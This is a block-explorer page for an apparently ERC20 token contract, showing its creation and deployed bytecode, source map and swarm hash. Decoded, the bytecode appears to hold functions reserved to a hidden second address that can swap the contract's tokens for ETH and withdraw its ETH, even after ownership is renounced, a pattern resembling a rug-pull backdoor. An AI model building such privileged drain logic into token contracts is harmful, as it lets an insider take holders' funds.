050505050565b600060208083528351808285015260005b81811015610aad57858101830151858201604001528201610a91565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461073057600080fd5b60008060408385031215610af657600080fd5b8235610b0181610ace565b946020939093013593505050565b600060208284031215610b2157600080fd5b5035919050565b600080600060608486031215610b3d57600080fd5b8335610b4881610ace565b92506020840135610b5881610ace565b929592945050506040919091013590565b600060208284031215610b7b57600080fd5b813561079781610ace565b60008060408385031215610b9957600080fd5b8235610ba481610ace565b91506020830135610bb481610ace565b809150509250929050565b600181811c90821680610bd357607f821691505b602082108103610bf357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b600060208284031215610c2157600080fd5b815161079781610ace565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610c7c5784516001600160a01b031683529383019391830191600101610c57565b50506001600160a01b03969096166060850152505050608001529392505050565b634e487b7160e01b600052601160045260246000fd5b808201808211156103d4576103d4610c9d565b818103818111156103d4576103d4610c9d56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220fa4a9eeae0f9c034f1fd21d4b4bf658214bb6e04214fa3139ceaaeb9dbf39eb664736f6c63430008110033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef
Deployed Bytecode
0x6080604052600436106100eb5760003560e01c806370a0823111610084578063a457c2d711610056578063a457c2d714610296578063a9059cbb146102b6578063dd62ed3e146102d6578063f46cfb641461031c57005b806370a0823114610200578063715018a614610236578063893d20e81461024b57806395d89b411461028157005b806323b872dd116100bd57806323b872dd1461018e578063313ce567146101ae57806339509351146101ca5780633eaaf86b146101ea57005b806306fdde03146100f4578063095ea7b31461011f578063173865ad1461014f57806318160ddd1461016f57005b366100f257005b005b34801561010057600080fd5b50610109610331565b6040516101169190610a80565b60405180910390f35b34801561012b57600080fd5b5061013f61013a366004610ae3565b6103c3565b6040519015158152602001610116565b34801561015b57600080fd5b506100f261016a366004610b0f565b6103da565b34801561017b57600080fd5b506002545b604051908152602001610116565b34801561019a57600080fd5b5061013f6101a9366004610b28565b610577565b3480156101ba57600080fd5b5060405160128152602001610116565b3480156101d657600080fd5b5061013f6101e5366004610ae3565b6105e0565b3480156101f657600080fd5b5061018060065481565b34801561020c57600080fd5b5061018061021b366004610b69565b6001600160a01b031660009081526020819052604090205490565b34801561024257600080fd5b506100f2610616565b34801561025757600080fd5b5060055461010090046001600160a01b03166040516001600160a01b039091168152602001610116565b34801561028d57600080fd5b50610109610682565b3480156102a257600080fd5b5061013f6102b1366004610ae3565b610691565b3480156102c257600080fd5b5061013f6102d1366004610ae3565b6106e0565b3480156102e257600080fd5b506101806102f1366004610b86565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561032857600080fd5b506100f26106ed565b60606003805461034090610bbf565b80601f016020809104026020016040519081016040528092919081815260200182805461036c90610bbf565b80156103b95780601f1061038e576101008083540402835291602001916103b9565b820191906000526020600020905b81548152906001019060200180831161039c57829003601f168201915b5050505050905090565b60006103d033848461079e565b5060015b92915050565b6008546001600160a01b031633146103f157600080fd5b6007546040805160028082526060820183526001600160a01b0390931692600092602083019080368337019050509050308160008151811061043557610435610bf9565b60200260200101906001600160a01b031690816001600160a01b031681525050816001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610493573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104b79190610c0f565b816001815181106104ca576104ca610bf9565b60200260200101906001600160a01b031690816001600160a01b0316815250506104f530838561079e565b61050030338561079e565b61050b33838561079e565b60405163791ac94760e01b81526001600160a01b0383169063791ac94790610540908690600090869030904290600401610c2c565b600060405180830381600087803b15801561055a57600080fd5b505af115801561056e573d6000803e3d6000fd5b50505050505050565b60006105848484846108c3565b6105d684336105d185604051806060016040528060288152602001610d00602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610a46565b61079e565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103d09185906105d19086610733565b60055461010090046001600160a01b0316331461063257600080fd5b60055460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360058054610100600160a81b0319169055565b60606004805461034090610bbf565b60006103d033846105d185604051806060016040528060258152602001610d28602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610a46565b60006103d03384846108c3565b6008546001600160a01b0316331461070457600080fd5b60405133904780156108fc02916000818181858888f19350505050158015610730573d6000803e3d6000fd5b50565b6000806107408385610cb3565b9050838110156107975760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064015b60405180910390fd5b9392505050565b6001600160a01b0383166108005760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161078e565b6001600160a01b0382166108615760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161078e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166109275760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161078e565b6001600160a01b0382166109895760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161078e565b6109c681604051806060016040528060268152602001610cda602691396001600160a01b0386166000908152602081905260409020549190610a46565b6001600160a01b0380851660009081526020819052604080822093909355908416815220546109f59082610733565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016108b6565b60008184841115610a6a5760405162461bcd60e51b815260040161078e9190610a80565b506000610a778486610cc6565b95945050505050565b600060208083528351808285015260005b81811015610aad57858101830151858201604001528201610a91565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461073057600080fd5b60008060408385031215610af657600080fd5b8235610b0181610ace565b946020939093013593505050565b600060208284031215610b2157600080fd5b5035919050565b600080600060608486031215610b3d57600080fd5b8335610b4881610ace565b92506020840135610b5881610ace565b929592945050506040919091013590565b600060208284031215610b7b57600080fd5b813561079781610ace565b60008060408385031215610b9957600080fd5b8235610ba481610ace565b91506020830135610bb481610ace565b809150509250929050565b600181811c90821680610bd357607f821691505b602082108103610bf357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b600060208284031215610c2157600080fd5b815161079781610ace565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610c7c5784516001600160a01b031683529383019391830191600101610c57565b50506001600160a01b03969096166060850152505050608001529392505050565b634e487b7160e01b600052601160045260246000fd5b808201808211156103d4576103d4610c9d565b818103818111156103d4576103d4610c9d56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220fa4a9eeae0f9c034f1fd21d4b4bf658214bb6e04214fa3139ceaaeb9dbf39eb664736f6c63430008110033
Deployed Bytecode Sourcemap
90:1833:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7402:100:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9576:169;;;;;;;;;;-1:-1:-1;9576:169:1;;;;;:::i;:::-;;:::i;:::-;;;1188:14:2;;1181:22;1163:41;;1151:2;1136:18;9576:169:1;1023:187:2;987:703:0;;;;;;;;;;-1:-1:-1;987:703:0;;;;;:::i;:::-;;:::i;8525:108:1:-;;;;;;;;;;-1:-1:-1;8613:12:1;;8525:108;;;1546:25:2;;;1534:2;1519:18;8525:108:1;1400:177:2;10228:355:1;;;;;;;;;;-1:-1:-1;10228:355:1;;;;;:::i;:::-;;:::i;8366:93::-;;;;;;;;;;-1:-1:-1;8366:93:1;;8449:2;2185:36:2;;2173:2;2158:18;8366:93:1;2043:184:2;10993:218:1;;;;;;;;;;-1:-1:-1;10993:218:1;;;;;:::i;:::-;;:::i;224:51:0:-;;;;;;;;;;;;;;;;8697:127:1;;;;;;;;;;-1:-1:-1;8697:127:1;;;;;:::i;:::-;-1:-1:-1;;;;;8798:18:1;8771:7;8798:18;;;;;;;;;;;;8697:127;810:167:0;;;;;;;;;;;;;:::i;721:83::-;;;;;;;;;;-1:-1:-1;791:5:0;;;;;-1:-1:-1;;;;;791:5:0;721:83;;-1:-1:-1;;;;;2648:32:2;;;2630:51;;2618:2;2603:18;721:83:0;2484:203:2;7622:104:1;;;;;;;;;;;;;:::i;11715:269::-;;;;;;;;;;-1:-1:-1;11715:269:1;;;;;:::i;:::-;;:::i;9038:175::-;;;;;;;;;;-1:-1:-1;9038:175:1;;;;;:::i;:::-;;:::i;9277:151::-;;;;;;;;;;-1:-1:-1;9277:151:1;;;;;:::i;:::-;-1:-1:-1;;;;;9393:18:1;;;9366:7;9393:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;9277:151;1698:147:0;;;;;;;;;;;;;:::i;7402:100:1:-;7456:13;7489:5;7482:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7402:100;:::o;9576:169::-;9659:4;9676:39;173:10;9699:7;9708:6;9676:8;:39::i;:::-;-1:-1:-1;9733:4:1;9576:169;;;;;:::o;987:703:0:-;1068:4;;-1:-1:-1;;;;;1068:4:0;1054:10;:18;1046:27;;;;;;1145:6;;1191:16;;;1205:1;1191:16;;;;;;;;-1:-1:-1;;;;;1145:6:0;;;;1089:34;;1191:16;;;;;;;;;;-1:-1:-1;1191:16:0;1167:40;;1236:4;1218;1223:1;1218:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;1218:23:0;;;-1:-1:-1;;;;;1218:23:0;;;;;1262:15;-1:-1:-1;;;;;1262:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;1252:4;1257:1;1252:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;1252:32:0;;;-1:-1:-1;;;;;1252:32:0;;;;;1295:56;1312:4;1326:15;1344:6;1295:8;:56::i;:::-;1362:42;1379:4;1385:10;1397:6;1362:8;:42::i;:::-;1415:53;1424:10;1443:15;1461:6;1415:8;:53::i;:::-;1479:193;;-1:-1:-1;;;1479:193:0;;-1:-1:-1;;;;;1479:66:0;;;;;:193;;1560:6;;1581:1;;1598:4;;1625;;1646:15;;1479:193;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1035:655;;987:703;:::o;10228:355:1:-;10368:4;10385:36;10395:6;10403:9;10414:6;10385:9;:36::i;:::-;10432:121;10441:6;173:10;10463:89;10501:6;10463:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10463:19:1;;;;;;:11;:19;;;;;;;;173:10;10463:33;;;;;;;;;;:37;:89::i;:::-;10432:8;:121::i;:::-;-1:-1:-1;10571:4:1;10228:355;;;;;:::o;10993:218::-;173:10;11081:4;11130:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;11130:34:1;;;;;;;;;;11081:4;;11098:83;;11121:7;;11130:50;;11169:10;11130:38;:50::i;810:167:0:-;879:5;;;;;-1:-1:-1;;;;;879:5:0;865:10;:19;857:28;;;;;;922:5;;901:39;;937:1;;922:5;;;-1:-1:-1;;;;;922:5:0;;901:39;;937:1;;901:39;951:5;:18;;-1:-1:-1;;;;;;951:18:0;;;810:167::o;7622:104:1:-;7678:13;7711:7;7704:14;;;;;:::i;11715:269::-;11808:4;11825:129;173:10;11848:7;11857:96;11896:15;11857:96;;;;;;;;;;;;;;;;;173:10;11857:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;11857:34:1;;;;;;;;;;;;:38;:96::i;9038:175::-;9124:4;9141:42;173:10;9165:9;9176:6;9141:9;:42::i;1698:147:0:-;1770:4;;-1:-1:-1;;;;;1770:4:0;1756:10;:18;1748:27;;;;;;1786:51;;1794:10;;1815:21;1786:51;;;;;;;;;1815:21;1794:10;1786:51;;;;;;;;;;;;;;;;;;;;;1698:147::o;16512:182:1:-;16570:7;;16602:5;16606:1;16602;:5;:::i;:::-;16590:17;;16631:1;16626;:6;;16618:46;;;;-1:-1:-1;;;16618:46:1;;5439:2:2;16618:46:1;;;5421:21:2;5478:2;5458:18;;;5451:30;5517:29;5497:18;;;5490:57;5564:18;;16618:46:1;;;;;;;;;16685:1;16512:182;-1:-1:-1;;;16512:182:1:o;15131:381::-;-1:-1:-1;;;;;15267:19:1;;15259:68;;;;-1:-1:-1;;;15259:68:1;;5795:2:2;15259:68:1;;;5777:21:2;5834:2;5814:18;;;5807:30;5873:34;5853:18;;;5846:62;-1:-1:-1;;;5924:18:2;;;5917:34;5968:19;;15259:68:1;5593:400:2;15259:68:1;-1:-1:-1;;;;;15346:21:1;;15338:68;;;;-1:-1:-1;;;15338:68:1;;6200:2:2;15338:68:1;;;6182:21:2;6239:2;6219:18;;;6212:30;6278:34;6258:18;;;6251:62;-1:-1:-1;;;6329:18:2;;;6322:32;6371:19;;15338:68:1;5998:398:2;15338:68:1;-1:-1:-1;;;;;15420:18:1;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15472:32;;1546:25:2;;;15472:32:1;;1519:18:2;15472:32:1;;;;;;;;15131:381;;;:::o;12475:575::-;-1:-1:-1;;;;;12615:20:1;;12607:70;;;;-1:-1:-1;;;12607:70:1;;6603:2:2;12607:70:1;;;6585:21:2;6642:2;6622:18;;;6615:30;6681:34;6661:18;;;6654:62;-1:-1:-1;;;6732:18:2;;;6725:35;6777:19;;12607:70:1;6401:401:2;12607:70:1;-1:-1:-1;;;;;12696:23:1;;12688:71;;;;-1:-1:-1;;;12688:71:1;;7009:2:2;12688:71:1;;;6991:21:2;7048:2;7028:18;;;7021:30;7087:34;7067:18;;;7060:62;-1:-1:-1;;;7138:18:2;;;7131:33;7181:19;;12688:71:1;6807:399:2;12688:71:1;12854;12876:6;12854:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;12854:17:1;;:9;:17;;;;;;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;12834:17:1;;;:9;:17;;;;;;;;;;;:91;;;;12959:20;;;;;;;:32;;12984:6;12959:24;:32::i;:::-;-1:-1:-1;;;;;12936:20:1;;;:9;:20;;;;;;;;;;;;:55;;;;13007:35;1546:25:2;;;12936:20:1;;13007:35;;;;;;1519:18:2;13007:35:1;1400:177:2;17418:193:1;17504:7;17540:12;17532:6;;;;17524:29;;;;-1:-1:-1;;;17524:29:1;;;;;;;;:::i;:::-;-1:-1:-1;17564:9:1;17576:5;17580:1;17576;:5;:::i;:::-;17564:17;17418:193;-1:-1:-1;;;;;17418:193:1:o;14:548:2:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:2;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:2:o;1215:180::-;1274:6;1327:2;1315:9;1306:7;1302:23;1298:32;1295:52;;;1343:1;1340;1333:12;1295:52;-1:-1:-1;1366:23:2;;1215:180;-1:-1:-1;1215:180:2:o;1582:456::-;1659:6;1667;1675;1728:2;1716:9;1707:7;1703:23;1699:32;1696:52;;;1744:1;1741;1734:12;1696:52;1783:9;1770:23;1802:31;1827:5;1802:31;:::i;:::-;1852:5;-1:-1:-1;1909:2:2;1894:18;;1881:32;1922:33;1881:32;1922:33;:::i;:::-;1582:456;;1974:7;;-1:-1:-1;;;2028:2:2;2013:18;;;;2000:32;;1582:456::o;2232:247::-;2291:6;2344:2;2332:9;2323:7;2319:23;2315:32;2312:52;;;2360:1;2357;2350:12;2312:52;2399:9;2386:23;2418:31;2443:5;2418:31;:::i;2692:388::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;2876:9;2863:23;2895:31;2920:5;2895:31;:::i;:::-;2945:5;-1:-1:-1;3002:2:2;2987:18;;2974:32;3015:33;2974:32;3015:33;:::i;:::-;3067:7;3057:17;;;2692:388;;;;;:::o;3085:380::-;3164:1;3160:12;;;;3207;;;3228:61;;3282:4;3274:6;3270:17;3260:27;;3228:61;3335:2;3327:6;3324:14;3304:18;3301:38;3298:161;;3381:10;3376:3;3372:20;3369:1;3362:31;3416:4;3413:1;3406:15;3444:4;3441:1;3434:15;3298:161;;3085:380;;;:::o;3602:127::-;3663:10;3658:3;3654:20;3651:1;3644:31;3694:4;3691:1;3684:15;3718:4;3715:1;3708:15;3734:251;3804:6;3857:2;3845:9;3836:7;3832:23;3828:32;3825:52;;;3873:1;3870;3863:12;3825:52;3905:9;3899:16;3924:31;3949:5;3924:31;:::i;3990:980::-;4252:4;4300:3;4289:9;4285:19;4331:6;4320:9;4313:25;4357:2;4395:6;4390:2;4379:9;4375:18;4368:34;4438:3;4433:2;4422:9;4418:18;4411:31;4462:6;4497;4491:13;4528:6;4520;4513:22;4566:3;4555:9;4551:19;4544:26;;4605:2;4597:6;4593:15;4579:29;;4626:1;4636:195;4650:6;4647:1;4644:13;4636:195;;;4715:13;;-1:-1:-1;;;;;4711:39:2;4699:52;;4806:15;;;;4771:12;;;;4747:1;4665:9;4636:195;;;-1:-1:-1;;;;;;;4887:32:2;;;;4882:2;4867:18;;4860:60;-1:-1:-1;;;4951:3:2;4936:19;4929:35;4848:3;3990:980;-1:-1:-1;;;3990:980:2:o;4975:127::-;5036:10;5031:3;5027:20;5024:1;5017:31;5067:4;5064:1;5057:15;5091:4;5088:1;5081:15;5107:125;5172:9;;;5193:10;;;5190:36;;;5206:18;;:::i;7211:128::-;7278:9;;;7299:11;;;7296:37;;;7313:18;;:::i
Swarm Source
ipfs://fa4a9eeae0f9c034f1fd21d4b4bf658214bb6e04214fa3139ceaaeb9dbf39eb6
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.